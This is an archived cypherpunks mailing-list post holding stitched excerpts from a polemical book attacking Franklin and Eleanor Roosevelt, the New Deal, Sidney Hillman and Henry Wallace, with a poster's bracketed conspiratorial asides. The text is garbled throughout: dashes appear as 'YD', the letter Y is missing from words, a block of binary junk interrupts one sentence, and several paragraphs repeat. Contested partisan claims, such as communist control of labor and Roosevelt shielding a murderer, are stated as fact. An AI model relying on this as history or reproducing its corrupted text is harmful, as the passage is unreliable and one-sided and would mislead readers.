but the man who went on the radio and told of the plan he did not construct,
in a speech he did not write. Thus
Fate plays at her ageYDold game of creating heroes. 

a Great Man attended by a Brain Trust to bring understanding first
and then order out of
chaos. 

Actually there are no big men in the sense in which Big Men are sold
to the people. There are men who are
bigger than others and a few who are wiser and more courageous and
farseeing than these. But it is possible
with the necessary pageantry and stage tricks to sell a fairly bright
fellow to a nation as an authentic BIG Man.
Actually this is developing into an art, if not a science. It takes
a lot of radio, movie, newspaper and magazine
work to do it, but it can be done. 
{FDR/Hitler - sog}

For the farmer the New Deal would encourage cooperatives and enlarge
government lending agencies. But the
greatest enemy of the farmer was his habit of producing too much. His
surplus ruined his prices. The New Deal
would contrive means of controlling the surplus and ensuring a profitable
price. 

As for business the New Deal proposed strict enforcement of the antiYDtrust
laws, full publicity about security
offerings, regulation of holding companies which sell securities in
interstate commerce, regulation of rates of
utility companies operating across state lines and the regulation of
the stock and commodity exchanges. 

Roosevelt in his preelection speeches had stressed all these points
YD observing the rights of the states so
far as to urge that relief, oldYDage pensions and unemployment insurance
should be administered by them, that
the federal government would merely aid the states with relief funds
and serve as collection agent for social
insurance.

First of all, his central principle YD his party's traditional principle
of war upon BIG government YD was reversed.
And he set out to build a government that in size dwarfed the government
of Hoover which he denounced. The
idea of a government that was geared to assist the economic system
to function freely by policing and
preventive interference in its freedom was abandoned for a government
which upon an amazing scale
undertook to organize every profession, every trade, every craft under
its supervision and to deal directly with
such details as the volume of production, the prices, the means and
methods of distribution of every
conceivable product. This was the NRA. It may be that this was a wise
experiment but it was certainly the very
reverse of the kind of government which Mr. Roosevelt proposed in his
New Deal. 

Enforcement of the antiYDtrust act was a longtime pet of his party and
it was considered as an essential
instrument to prevent cartels and trusts and combinations in restraint
of trade which were supposed to be
deadly to the system of free enterprise. The New Deal had called loudly
for its strict enforcement. et almost at
once it was suspended YD actually put aside during the experiment YD
in order to cartelize every industry in
America on the Italian corporative model. 
{Fascism! - sog}

First, and most important, was the NRA and its dynamic ringmaster,
General Hugh Johnson. As I write, of
course, Mussolini is an evil memory. But in 1933 he was a towering
figure who was supposed to have
discovered something worth study and imitation by all world artificers
everywhere. 

The NRA provided that in
America each industry should be organized into a federally supervised
trade association. It was not called a
corporative. It was called a Code Authority. But it was essentially
the same thing. These code authorities could
regulate production, quantities, qualities, prices, distribution methods,
etc., under the supervision of the NRA.
This was fascism. The antiYDtrust laws forbade such organizations. Roosevelt
had denounced Hoover for not
enforcing these laws sufficiently. Now he suspended them and compelled
men to combine. 

In spite of all the fine words about industrial democracy, people began
to see it was a scheme to permit business men to combine to put up
prices and keep them up by direct decree or
through other devious devices. The consumer began to perceive that
he was getting it in the neck.

. A tailor named Jack Magid in New Jersey was arrested, convicted,
fined and sent to jail. The crime was that he had pressed a suit of
clothes for 35 cents when the Tailors' Code
fixed the price at 40 cents. The price was fixed not by a legislature
or Congress but by the tailors.

The NRA was discovering it could not enforce its rules. Black markets
grew up. Only the most violent police
methods could procure enforcement. In Sidney Hillman's garment industry
the code authority employed
enforcement police.8 They roamed through the garment district like
storm troopers. They could enter a man's
factory, send him out, line up his employees, subject them to minute
interrogation, take over his books on the
instant. Night work was forbidden. Flying squadrons of these private
coatYDandYDsuit police went through the
district at night, battering down doors with axes looking for men who
were committing the crime of sewing
together a pair of pants at night. But without these harsh methods
many code authorities said there could be
no compliance because the public was not back of it. 

"Mob rule and racketeering had a considerable
degree displaced orderly government."9 

On May 27, 1935, the Supreme Court, to everybody's relief, declared
the
NRA unconstitutional. It held that Congress at Roosevelt's demand had
delegated powers to the President and
the NRA which it had no right to delegate YD namely the power to make
laws. It called the NRA a Congressional
abdication. And the decision was unanimous, Brandeis, Cardozo and Holmes
joining in it. 

But of course he had imposed it not as a temporary expedient but as
a new order and he boasted of it. He had
done his best to impose the dissolution of the antiYDtrust laws on the
country. 

Curiously enough, while Wallace was paying out hundreds of millions
to kill millions of hogs, burn oats, plow
under cotton, the Department of Agriculture issued a bulletin telling
the nation that the great problem of our
time was our failure to produce enough food to provide the people with
a mere subsistence diet.

Oliphant was a lawyer whose reformist addictions overflowed into every
branch of public affairs. A
devout believer in rubber laws, it was easy for him to find one which
could be stretched to include rubber
dollars. 

We are thus continuing to move toward a managed
currency." 

Roosevelt's billions, adroitly used, had broken down every
political machine in America. The patronage they once lived on and
the local money they once had to disburse
to help the poor was trivial compared to the vast floods of money Roosevelt
controlled. And no political boss
could compete with him in any county in America in the distribution
of money and jobs. 

The poll indicated that Long could corral 100,000 voted in New ork
State, which could, in a close
election, cost Roosevelt the electoral vote there. Long became a frequent
subject of conversation at the White
House. 

Dr. Carl Austin Weiss, a young physician,
eluded the vigilance of Long's guards and shot him. 

" A monument stands to the memory of this arch demagogue in the Hall
of Fame of the
Capitol building in Washington and his body rests in a crypt on the
state capitol grounds YD a shrine to which
crowds flock every day to venerate the memory of the man who trampled
on their laws, spat upon their
traditions, loaded them with debt and degraded their society to a level
resembling the plight of a European
fascist dictatorship. 

The Treasury and the Department of Justice went into action and before
long there were income tax
indictments against at least 25 of the Long leaders and henchmen. 

When little men think about large problems the boundary between the
sound and the unsound is very thin and vague. And when some idea is
thrown out which corresponds with
the deeply rooted yearnings of great numbers of spiritually and economically
troubled people it spreads like a
physical infection and rises in virulence with the extent of the contagion.
The spiritual and mental soil of the
masses near the bottom of the economic heap was perfect ground for
all these promisers of security and
abundance. 

They had cooked up for themselves that easy, comfortable potpourri
of socialism
and capitalism called the Planned Economy which provided its devotees
with a wide area in which they might
rattle around without being called Red. 

But the time would come when they would approach much closer
to their dream of a planned people. We shall see that later. 

He was a man literally without any fundamental philosophy. The positions
he took on political and economic
questions were not taken in accordance with deeply rooted political
beliefs but under the influence of political
necessity. 

NRA and the AAA. This was a plan to take the whole industrial and agricultural
life of the country under
the wing of the government, organize it into vast farm and industrial
cartels, as they were called in Germany,as they were called in Italy,
and operate business and the farms under plans made and carried out
under the supervision of government. 

As for the Reds, they did not move in heavily until the second term
and not en masse until the third
term, although the entering wedge was made in the first. And then the
point of entry was the labor movement. 

This thing called revolutionary propaganda and activity is something
of an art in itself.
It has been developed to a high degree in Europe where revolutionary
groups have been active for half a
century and where Communist revolutionary groups have achieved such
success during the past 25 years. It
was, at this time of which I write, practically unknown to political
and labor leaders in this country and is still
unknown to the vast majority of political leaders.

He vetoed that but had
an arrangement with the Democratic leadership that they would pass
it over his head. Thus the President could
get credit for trying to kill it while the Democrats would get credit
for actually passing it. 

Their chief reliance was
upon the charge that the President had usurped the powers of Congress,
attacked the integrity of the courts,
invaded the constitutional prerogatives of the states, attempted to
substitute regulated monopoly for free
enterprise, forced through Congress unconstitutional laws, filled a
vast array of bureaus with swarms of
bureaucrats to harass the people and breed fear in commerce and industry,
discourage new enterprises and
thus prolonged the depression, had used relief to corrupt and intimidate
the voters and made appeals to class
prejudice to inflame the masses and create dangerous divisions. 

Their chief reliance was
upon the charge that the President had usurped the powers of Congress,
attacked the integrity of the courts,
invaded the constitutional prerogatives of the states, attempted to
substitute regulated monopoly for free
enterprise, forced through Congress unconstitutional laws, filled a
vast array of bureaus with swarms of
bureaucrats to harass the people and breed fear in commerce and industry,
discourage new enterprises and
thus prolonged the depression, had used relief to corrupt and intimidate
the voters and made appeals to class
prejudice to inflame the masses and create dangerous divisions. 
. From the moment the
gavel fell to open that wild conclave to the knock of the adjourning
gavel everything that was said and done or
that seemed to just happen was in accordance with a carefully arranged
and managed scenario. The delegates
were mere puppets and answered to their cues precisely like the extras
in a movie mob scene. 

the South had both arms up to its shoulder blades in Roosevelt's relief
and
public works barrel. National politics was now paying off in the South
in terms of billions. When Alf Landon
talked about Roosevelt's invasions of the Constitution, the man on
relief and the farmer fingering his subsidy
check replied "ou can't eat the Constitution."

As to the public debt he said we
borrowed eight billions but we have increases the national income by
22 billions. Would you borrow $800 a
year if thereby you could increase your income by $2200, he asked.
That is what we have done, he answered,
with the air of a man who has easily resolved a tough conundrum. And
though the figures were false and the
reasoning even more so it was practically impossible for a Republican
orator to reason with voters against
these seemingly obvious and plausible figures. 

The President's victory was due to one thing and one thing only, to
that one great rabbit YD the spending rabbit YD
he had so reluctantly pulled out of his hat in 1933. This put into
his hands a fund amounting to nearly 20 billion
dollars with which he was able to gratify the appetites of vast groups
of people in every county in America

. Without the revival of investment there could
be no revival of the economic system. The system was being supported
by government spending of borrowed
funds. 

Roosevelt's unwillingness to compromise now angered his own supporters
who were being forced to carry this
unpopular cause. In the end he had to assure Robinson that he would
have the appointment, and then to
crown Roosevelt's difficulties, Robinson was stricken with a heart
attack in the Senate and died shortly after,
alone in his apartment. 

The Treasury made a practice of keeping tricky books and producing
phony results. It had merely shifted relief payments to other accounts.
They were, in fact, larger than the year
before. 

Then he revealed the extent of his plans YD they
would have to step up spending, forget about balancing the budget and
get along with a two or three billion
dollar a year deficit for two years. Then a conservative would come
into office. That administration would do
what Roosevelt had been promising he would do YD quit government spending.
And then the whole thing would
go down in a big crash.

Then he revealed the extent of his plans YD they
would have to step up spending, forget about balancing the budget and
get along with a two or three billion
dollar a year deficit for two years. Then a conservative would come
into office. That administration would do
what Roosevelt had been promising he would do YD quit government spending.
And then the whole thing would
go down in a big crash.

What could he spend on? That was the problem.
There is only a limited number of things on which the federal government
can spend.

The one big thing the federal government can spend money on is the
army and navy.

The depression which assaulted our unprepared society in 1929 was by
no means a mysterious phenomenon to
those who had given any attention to the more or less new studies in
the subject of the business cycle. It was,
first of all and essentially, one of those cyclical disturbances common
to the system of private enterprise. That
economic system has in it certain defects that expose it at intervals
to certain maladjustments. And this was
one of those intervals. Had it been no more than this it could have
been checked and reversed in two or three
years. But this cyclical depression was aggravated by additional irritants:

1. The banking system had been gravely weakened by a group of abuses,
some of which arose out of the
cupidity of some bankers and others out of ignorance. 

2. A wild orgy of speculation had intruded into the system stimulated
by a group of bad practices in the
investment banking field. 

3. A depression in Europe arising out of special causes there had produced
the most serious repercussions
here. 

The great, central consequence of these several disturbances was to
check and then almost halt completely,
the flow of savings into investment. All economists now know what few,
apparently, knew then YD that in the
capitalist system, power begins in the payments made by employers to
workers and others in the process of
producing goods. And this must be constantly freshened by an uninterrupted
flow of savings into investment
YD the creation of new enterprises and the expansion of old ones. If
this flow of savings into investment slows
down the whole economic system slows down. If it is checked severely
the whole economic system goes into a
collapse. 

throughout Hoover's term one of these YD the ruthless operation of gamblers
in the stock market with the
dangerous weapon of short selling YD continued to add at intervals spectacular
crashes in the market which
intensified the declining confidence of the people. 

But Hoover had against him, in addition to those natural, international
and social disturbances, an additional
force, namely a Democratic House of Representatives which set itself
with relentless purpose against
everything he attempted to do from 1930 on. It had a vested interest
in the depression.

and generally to do all those things he had denounced in Hoover without
the slightest foundation for
the charges.

It was always easy to sell him a plan that involved giving away government
money.
It was always easy to interest him in a plan which would confer some
special benefit upon some special class in
the population in exchange for their votes. He was sure to be interested
in any scheme that had the appearance
of novelty and he would seize quickly upon a plan that would startle
and excite people by its theatrical
qualities.

He did not dream of the
incredible miracle of government BANK borrowing. He did not know that
the bank lends money which it
actually creates in the act of making the loan. When Roosevelt realized
this, he saw he had something very
handy in his tool kit. He could spend without taxing people or borrowing
from them, while at the same time
creating billions in bank deposits. Wonderful! 

Roosevelt
discovered what the Italian Premier Giolitti had discovered over 50
years before, that it was not necessary to
buy the politicians. He bought their constituents with borrowed money
and the politicians had to go along.

Those who, in their poverty and helplessness, refused to surrender
their independence, paid for it. A man in
Plymouth, Pa., was given a whiteYDcollar relief job before election
at $60.50 a month. He was told to change his
registration from Republican to Democratic. He refused and very soon
found himself transferred YD transferred
from his whiteYDcollar job to a pickYDaxe job on a rock pile in a quarry.
There he discovered others on the rock pile
who had refused to change their registration. This was in America,
the America of the men who were chanting
and crooning about liberty and freedom 365 days a year, who were talking
about democracy and freedom for all
men everywhere. 

These primaries of 1938, of course, were the scenes of the great Roosevelt
purge, when distinguished
Democratic senators and congressmen were marked for annihilation.

It had already become a crime for a Democrat to disagree with the administration




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 27 Jul 1998 00:13:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: FDR2
Message-ID: <009C9C7C.1770AB80.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


They were eager
for America to get into a war if it came. But they felt the people
had to be drawn along a little at a time. They
wanted the President to frighten the people a little as a starter.
But he increased the recommended dose. The
reaction was so violent that they felt it put back by at least six
months the purpose they had in mind YD rousing
America to a warlike mood. 

However, following the Panay
incident, Mr. Hull began to churn up as much war spirit as possible
and through the radio and the movies
frantic efforts were made to whip up the anger of the American people.

There never has been in American politics a religion so expansively
and luminously righteous as the New Deal.
>From the beginning to the end it was constant in one heroic enterprise
YD war to the death upon evil, upon greed,
poverty and oppression. It had, in fact, one monstrous enemy against
which it tilted its shining spear seven
days a week and that was SIN. If you criticized the New Deal, you were
for sin. 

There is no vast sum of money in holding
office. The riches are in the perquisites, the graft, legal and illegal,
often collected by men who do not hold
office but who do business with those who do. Some Democratic chieftains
of the newer stripe began to drift
into vice rackets of various sorts.

It was this Tammany at its lowest level which surrendered to the New
Deal and became finally the political tool
of Mr. Roosevelt in New ork. From an oldYDfashioned political district
machine interested in jobs and
patronage, living on the public payroll and on various auxiliary grafts,
some times giving a reasonably good
physical administration of the city government, some times a pretty
bad one, some times very corrupt, some
times reasonably honest, it became a quasiYDcriminal organization flying
the banner of the Free World and the
Free Man. 

Cermak fought Roosevelt's nomination at Chicago, and went to Miami
in February, 1933 to make his peace with
Roosevelt where the bullet intended for Roosevelt killed him.
{Who fired the shot? - sog}

d before the House Committee Investigating UnYDAmerican Activities.
Frey, in a
presentation lasting several days, laid before the Committee a completely
documented account of the
penetration of the CIO by the Communist Party. He gave the names of
280 organizers in CIO unions 

It was the Communists who were engineering the sitYDdown strikes and
who instigated and organized the
Lansing Holiday when a mob of 15,000 blockaded the state capitol and
2,000 of them, armed with clubs, were
ordered to march on the university and bring part of it back with them.
At the Herald Tribune forum in New
ork City about this time the President delivered one of the bitterest
attacks he had ever made on a government
official. It was against Martin Dies for investigating these Communist
influences in the sitYDdown strikes. 

Sidney Hillman would become not only its
dominating mind but Roosevelt's closest adviser in the labor movement
and in the end, though not himself a
Democrat, the most powerful man in the Democratic party. 

Sidney Hillman28 was born in Zargare, Lithuania, then part of Russia,
in 1887. He arrived here in 1907 after a
brief sojourn in England.
it is entirely probable that Hillman, while not a Communist, was at
all times
sympathetic to the Communist philosophy. He was a revolutionist 

It is certain that the Russian revolution set off a very vigorous flame
in Hillman's bosom. In 1922 he hurried
over to Russia with a plan. He had organized here what he called the
RussianYDAmerican Industrial Corporation
with himself as president. Its aim was to operate the "textile and
clothing industry of Russia." Hillman's
corporation sold to labor organizations at $10 a share a quarter of
a million dollars of stock. The circular letter of
the corporation soliciting stock sales among labor unions said: "It
is our paramount moral obligation to help
struggling Russia get on her feet." Hillman went to Russia to sell
the idea to Lenin. He cabled back from
Moscow: "Signed contract guarantees investment and minimum 8 per cent
dividend. Also banking contract
permitting to take charge of delivery of money at lowest rate. Make
immediate arrangements for transmission of
money. Had long conference with Lenin who guaranteed Soviet support."

Hillman was never an outright exponent of Communist objectives. He
was, however, deeply sympathetic to the
Communist cause in Russia and to the extreme leftYDwing ideal in America,
but he was an extremely practical man
who never moved upon any trench that he did not think could be taken.
He never pressed his personal
philosophy into his union and his political activities any further
than practical considerations made wise. 

He was a resolute man who shrank from no instrument that could be used
in his plans. He was a cocksure,
selfYDopinionated man and he was a bitter man, relentless in his hatreds.
He had perhaps one of the best minds
in the labor movement YD sharp, ceaselessly active and richly stored
with the history and philosophy of the labor
struggle and of revolutionary movements in general. When Lewis and
Dubinsky at a later date would leave the
CIO, Hillman would be supreme and would reveal somewhat more clearly
the deep roots of his revolutionary
yearnings that had been smothered for a while under the necessities
of practical leadership. 

There is no doubt that Hillman was one of the first labor leaders to
use the goon as part of his enforcement
machinery.

Why should LaGuardia want to scuttle the investigation of a notorious
murder? Why should the President of
the United States refuse to deliver Lepke to Dewey and thus save him
from going to the chair? Why save the
life of a man convicted as the leader of a murder syndicate? Who was
the leading politician supposed to be
involved? Who was the nationally known labor leader? 

The murder for which Lepke was convicted and wanted for execution by
Dewey and shielded by Roosevelt
was, as we have seen, that of Joseph Rosen. Rosen was a trucking contractor
who was hauling to nonYDunion
factories in other states for finishing, clothing cut under union conditions
in New ork. He was put out of
business by Lepke in the interest of a local of Hillman's Amalgamated
and Rosen was threatening to go to the
district attorney and tell how this was done.

But for some reason there rose to the surface at this
time a lawless element, some of them criminal, some of them lawless
in the excess of their revolutionary zeal,
some of them just plain grafters. And these elements constituted the
most powerful section of those groups
that were supporting the President. This was in no sense the Army of
the Lord, as it was so widely advertised. 

He wanted
ambassadors from their own countries to tell them that other governments
were "looking to Roosevelt as the
savior of the world," as he put it himself. Farley admits this was
done and says it was a mistake and that he said
so at the time. 
With the rise of the New Deal, however, a vast
army of persons appeared on the payroll of the federal government and
because some of the payrolls were
flexible and had no connection whatever with the Civil Service, it
was a simple matter for the government to use
this ancient but now enormously enhanced tool to control votes in particular
localities. 

The story of the third term campaign which we shall now see is the
story of dealing with all these
groups, and the feasibility of doing so successfully was enormously
enhanced by the fact that in September,
1939, just about the time the active work for the coming convention
was under way, Hitler marched into Poland.
{Just happens to fit right in with Planned Government/Economy - sog}

On July 17, 1940, Franklin D. Roosevelt was nominated for the presidency
for the third time. The prologue to
this event was supplied by Europe. 

When the convention met, Willkie
seemed the most unlikely of these candidates, but his strength grew.
Dewey was eliminated on the fourth ballot
and on the sixth, in a contest between Taft and Willkie, the latter
was nominated in one of the most amazing
upsets in convention history. 

The Democrats believed that Willkie would make a formidable opponent.
But from the moment he was
nominated the result of the election could no longer be in doubt. Charles
McNary, Republican leader in the
Senate, was nominated for the vice presidency. The joining of these
two men YD Willkie and McNary YD was so
impossible, they constituted so incongruous a pair that before the
campaign ended McNary seriously
considered withdrawing from the race. 

There was a moment in that convention when one voice was lifted in
solemn warning, the full meaning of which
was utterly lost upon the ears of the delegates. Former President Hoover,
in a carefully prepared address, talked
about the "weakening of the structure of liberty in our nation." He
talked of Europe's hundredYDyear struggle for
liberty and then how Europe in less than 20 years surrendered freedom
for bondage. This was not due to
Communism or fascism. These were the effects. "Liberty," he said, "had
been weakened long before the
dictators rose." Then he named the cause: 

"In every single case before the rise of totalitarian governments there
has been a period dominated by
economic planners. Each of these nations had an era under starryYDeyed
men who believed that they could plan
and force the economic life of the people. They believed that was the
way to correct abuse or to meet
emergencies in systems of free enterprise. They exalted the State as
the solvent of all economic problems. 

These men
shifted the relation of government to free enterprise from that of
umpire to controller. Directly or indirectly
they politically controlled credit, prices, production or industry,
farmer and laborer. They devalued,
pumpYDprimed and deflated. They controlled private business by government
competition, by regulation and by
taxes. They met every failure with demands for more and more power
and control ... 

societies oneYDfourth socialist, threeYDfourths
capitalist, administered by socialist ministries winding the chains
of bureaucratic planning around the strong
limbs of private enterprise. 

Mr. Hoover then undertook to describe the progress of this baleful
idea here in a series of headlines: Vast
Powers to President; Vast Extension of Bureaucracy; Supreme Court Decides
Against New Deal; Attack on
Supreme Court; Court Loaded with Totalitarian Liberals; Congress Surrenders
Power of Purse by Blank Checks
to President; Will of Legislators Weakened by Patronage and Pie; Attacks
on Business Stirring Class Hate;
Pressure Groups Stimulated; Men's Rights Disregarded by Boards and
Investigations; Resentment at Free
Opposition; Attempts to Discredit Free Press. 

e State Planned and Managed Capitalism

Roosevelt executed a political maneuver that beyond doubt caused great
embarrassment to the Republicans. He announced the appointment of Henry
L. Stimson, who had been
secretary of State under President Hoover, as Secretary of War, and
Frank Knox, candidate for vice president
with Landon in 1936, as Secretary of the Navy. 

He was laying his plans cunningly to have himself "drafted." The
movement began some time in 1939 and the leaders in it were Ed Kelly
of Chicago and Frank Hague of New
Jersey.

The debacle was the plan Roosevelt was engineering to
literally put the party out of business by inducing its leaders not
to contest his election. Commentators like
Dorothy Thompson and H.V. Kaltenborn and other proYDwar writers were
calling on the Republicans not to
contest the election. And Roosevelt schemed to induce the presidential
candidates of the party in 1936 to
become Secretaries of War and Navy respectively in his cabinet.

Wallace
He has been pictured as a vague
and impractical mystic, half scientist, half philosopher, with other
ingredients that approach the pictures in the
comic strips of the professor with the butterfly net. 

Wallace brought men like Tugwell into the Department as his UnderYDSecretary
of Agriculture

To understand what made this thoroughly dangerous man tick it is necessary
to look at another widely
advertised side of his nature YD his interest in mysticism. 

Some time in the 'twenties, a gentleman by the name of Nicholas Constantin
Roerich appeared on the American
scene. Roerich was a highly selfYDadvertised great philosopher on the
Eastern Asiatic model. He gathered
around himself a collection of admirers and disciples who addressed
him as their "Guru" YD a spiritual and
religious person or teacher. He dispensed to them a philosophic hash
compounded of pseudoYDogism and
other Oriental occult teachings that certain superior beings are commissioned
to guide the affairs of mankind.
Roerich wrote a long string of books YD "In Himalaya," "Fiery Stronghold,"
"Gates Into the Future," "The Art of
Asia," "Flame in Chalice," "Realm of Light." 

Logvan and Logdomor
were the names by which Horch was known in this mystic circle. 

stories in English language newspapers in China indicated that
Roerich applied to the 15th U.S. Infantry in Tientsin for rifles and
ammunition and that the expedition had
mysterious purposes. 

He cried out in ecstasy in a speech: "The people's revolution is on
the march and the devil and all his angels
cannot prevail against it. They cannot prevail because on the side
of the people is the Lord." Now he was
fighting not George Peek and Hugh Johnson and Harold Ickes. He was
fighting the devil and the bad angels.
And he had on his side the lord, Franklin D. Roosevelt, and the good
angels YD the Democrats and the CIO and,
in good time, he would be joined by Joe Stalin and Glen Taylor, the
singing Senator from Idaho. He would
begin making world blueprints YD filling all the continents with TVAs,
globeYDcircling sixYDlane highways, world
AAAs, World Recovery Administrations, World Parliaments and International
Policemen. 

This was the man chosen for Vice President by Roosevelt who had warned
that his health was not too good
and who forced this strange bird upon his party in the face of a storm
of angry protest. 

. One of Roosevelt's early
acts in foreign affairs was to recognize Soviet Russia. Three months
later YD February 28, 1934 YD Elliott went into a
deal with Anthony Fokker to sell the Soviet government 50 military
planes for a price which would leave a
commission of half a million dollars for Elliott and the same for Fokker

It is estimated that she has received during the 15 years
since she entered the White House at least three million dollars YD
which is not very bad for a lady who had no
earning power whatever before she moved her desk into the Executive
Mansion, a lady whose husband spent a
good deal of time denouncing the greed of men who made less for directing
some of the greatest enterprises in
America.17 

Nevertheless, in spite of these defiances of all the amenities, all
the laws imposed by decency, all the traditional
proprieties and all that body of rules which highYDminded people impose
upon themselves, the Roosevelt family,
through a carefully cultivated propaganda technique not unlike that
which is applied to the sale of quack
medicines, imposed upon the American people the belief that they were
probably the most highYDminded beings
that ever lived in the White House. Behind this curtain of moral grandeur
they were able to carry on in the field
of public policy the most incredible programs which our people, unaccustomed
to this sort of thing, accepted
because they believed these plans came out of the minds of very noble
and righteous beings. 

Why did the President permit his wife to carry on in this fantastic
manner and why did the Democratic leaders
allow her to do it without protest? ou may be sure that whenever you
behold a phenomenon of this character
there is a reason for it. The reason for it in this case was that Mrs.
Roosevelt was performing an important
service to her husband's political plans.

There were never enough people in the country belonging to the more
or less orthodox
Democratic fold to elect Mr. Roosevelt. It was necessary for him to
get the support of groups outside this
Democratic fold. 

In the election of 1944,
Governor Dewey got nearly half a million votes more on the Republican
ticket than Roosevelt got on the
Democratic ticket, but Roosevelt was the candidate of two other parties
YD the American Labor Party of the
Communists and the Liberal Party which was a collection of parlor pinks,
technocrats, pious fascists and
American nonYDStalinist Communists. These two parties gave him over
800,000 votes and it was this that made
up his majority in New ork. The same thing was true in Illinois, in
New Jersey, Connecticut, Massachusetts,
and other large industrial states, although the fact was not so obvious
because the radicals operated inside the
Democratic party where they could not be so easily identified. 

It was in this field that Mrs. Roosevelt performed her indispensable
services to the President. It was she who
fraternized with the Reds and the pinks, with the RedYDfascists and
the technocrats and the crackpot fringe
generally, gave them a sense of association with the White House, invited
their leaders and their pets to the
White House and to her apartment in New ork, went to their meetings,
endorsed their numerous front
organizations

Finally in 1899 when she was 15 years old she was sent to a school
called Allenwood, outside of London. It
was a French school kept by an old pedagogist named Madame Souvestre
who has taught Eleanor's aunt in
Paris before the FrancoYDPrussian war 

After Roosevelt was stricken with infantile paralysis in 1921, she
suddenly found herself for the first time in her
life in a position approaching power on her own feet. While she, with
her rather stern sense of formal
responsibility, made every effort to bring about her husband's recovery,
she also saw the necessity of keeping
alive his interests in public affairs and his contacts and she set
herself about that job. She had already fallen
into acquaintance with leftYDwing labor agitators and she brought these
people as frequently as she could to her
imprisoned husband where they proceeded to work upon a mind practically
empty so far as labor and economic
problems were concerned. The moment a person of Mrs. Roosevelt's type
exposes herself to these infections,
the word gets around radical circles, whose denizens are quick to see
the possibilities in an instrument of this
kind. During Roosevelt's term in Albany she was extensively cultivated
by these groups, so that when she
went to Washington in 1933 they had easy and friendly access to her.

I think it must be said for her that at this point YD in 1933 YD the
country, including its public men, were not too well
informed about the peculiar perils involved in Red propaganda activities.
The Reds seized upon three or four
very popular American democratic cults YD (1) freedom of speech, (2)
the defense of the downtrodden laborer YD
the forgotten man, (3) the succor of the poor. They also began to penetrate
the colleges in both the teaching
staffs and the student bodies through their various front organizations
dominated by Reds. The first attempt to
expose these designs was made by the House Committee on UnYDAmerican
Activities. The attacks upon Martin
Dies and the Dies Committee, as it was known, were engineered and carried
out almost entirely by the
Communist Party. But the Communist Party itself was powerless to do
anything effective and it used some of
the most powerful and prominent persons in the country to do its dirty
work
{Does this  not also apply to all other organizations/religions? -
sog}

oung Communist League and a group of workers including William W.
Hinckley
(Roosevelt/Cremac - Reagan/Brady -- 2 Hinkleys? - sog}

. Here
was the wife of the President of the United States, a separate department
of the government, using the White
House as a lobbying ground for a crowd of young Commies and Pinkies
against a committee of Congress.19 

At this very moment, Joe Lash was living in the
White House as Mrs. Roosevelt's guest, while Joe Cadden and Abbot Simon
were occasional boarders there.
. Joe Lash had been the leader of the
movement in the American Student Union. Lash worked in collaboration
with the Communist Party. After this,
the American Student Union became a mere tool of the Red organization
in America. 

the assembled
young philosophers gave the President and Mrs. Roosevelt a hearty Bronx
cheer. And now, of course, Mrs.
Roosevelt felt they were Communists, although she had rejected all
of the overwhelming evidence before that.
Booing the President suddenly turned them into Communists. 

. A member of Congress, and
ardent New Dealer, visited the White House one morning. While there
he saw Abbot Simon of the national
board of the American outh Congress, come out of one of the bedrooms.
He couldn't believe his eyes. He
asked the White House usher if he was mistaken. The usher assured him
he was not, that this little Commie tool
had been occupying that room for two weeks and sleeping in the bed
Lincoln had slept in. 

These are probably not more than 80,000 or 90,000 in number, if that.
But there are
several hundred thousand, perhaps half a million, men and women in
America, but chiefly in New ork and the
large eastern industrial states, who string along with the Communists
without being members of the party.

The President's father was a sixth generation Roosevelt who played
out decently
the role of a Hudson River squire. He was a dull, formal and respectable
person moving very narrowly within
the orbit set by custom for such a man. By 1900, however, the name
Roosevelt had become a good one for
promotional purposeyYYYY".Y~Y~^Y~S<OYYYYY~`'""Yz--~s>oY~Y~ Y-YYY~Y|Y~Y~cY~Y.Y*YDRY~YxYqY}Y~'YfY~YyY~Y~Yx
Y/Y,Y+Y~Y(AAAAY
YYY EYEEIIIIDNOOOOYxOUUUYY~YaYY YaYYYY
Y
YYY	Y
!Y
Y
Y~Y$YY"YoYYvYmYY#YYypYs,
because it had become illustrious by reason of Theodore Roosevelt who
belonged to a
very different branch of the family. 

On Franklin D. Roosevelt's mother's side there was certainly nothing
distinguished in the blood. Her father was
a crusty old China Sea trader and opium smuggler. The family had much
of its fortune in soft coal mines 

Roosevelt was born and grew up in the midst of a baronial estate, surrounded
by numerous acres and many
servants and hemmed about with an elaborate seclusion. What sort of
boy he was we do not know, save that
he was carefully guarded from other boys and grew up without that kind
of boyhood association usual in
America.

The only books that really
interested him were books on the Navy, particularly old books such
as appeal to a collector. He did amass a
considerable library in this field. It is to be assumed he read many
of them. But the history of the Navy and its
battles is not the history of the United States or of Europe or of
their tremendous and complex political and
social movements. 

They never elected anybody. They offered the nomination to young Roosevelt
and he took it reluctantly. But this was an auspicious year for the
New ork Democrats. 

In 1912, with the Republicans split in the great TaftYDRoosevelt feud,
the Democrats swept the country and
Roosevelt, though in bed throughout the campaign with typhoid, was
reelected State Senator. When Wilson
entered the White House and someone suggested it would be a good idea
to have a Democratic Roosevelt in
the administration, Franklin Roosevelt was offered the post of Assistant
Secretary of the Navy,

When the First World War ended he was
36. Apparently his service in the Department was satisfactory, though
I have never seen anywhere any
authentic evidence about it one way or the other.

Actually he was not very well known and had absolutely no record of
his own to justify the
nomination. But luck dogged his heels. 
{Luck/good fortune/auscpicious circumstances/ad infinitum - sog}

Then in August, 1921 Roosevelt was stricken with infantile paralysis,
which put an end to his career in politics
for the next seven years. 

During his Harvard days, shortly after his marriage, he and his bride
took a trip to Europe YD a regular tourist's
wandering from city to city. He had not been in Europe since save twice
when he went as Assistant Secretary
during the war on a naval inspection tour for about a month, and at
the end of the war on another tour in
connection with the demobilization of naval forces in Europe.

et somehow his promotion managers whipped up the myth that he
possessed some kind of intimate and close knowledge of

Life up to this had been
a long succession of gifts from Lady Luck, whose attendance he had
come to think of as a settled and
dependable affair. And she had failed him. The visitation of the terrible
sickness had perhaps effaced from his
character the assumption of superior fortune that made him hold his
head so high

In his efforts at recovery he had gone to Warm
Springs, Ga., and spent several years there. 
But Warm Springs became the subject of one of the most curious deals
in the nomination of a man to high
office
he said "one of the reasons he could not stand for governor was because
he had put a great deal
of his personal fortune into Warm Springs, and he felt he should stay
and manage the enterprise so that it
would eventually become a paying proposition."

"Confirming
my telephone message I wish much that I might consider the possibility
of running for governor." Roosevelt
then gave two reasons why he could not: (1) "our own record in New
ork is so clear that you will carry the
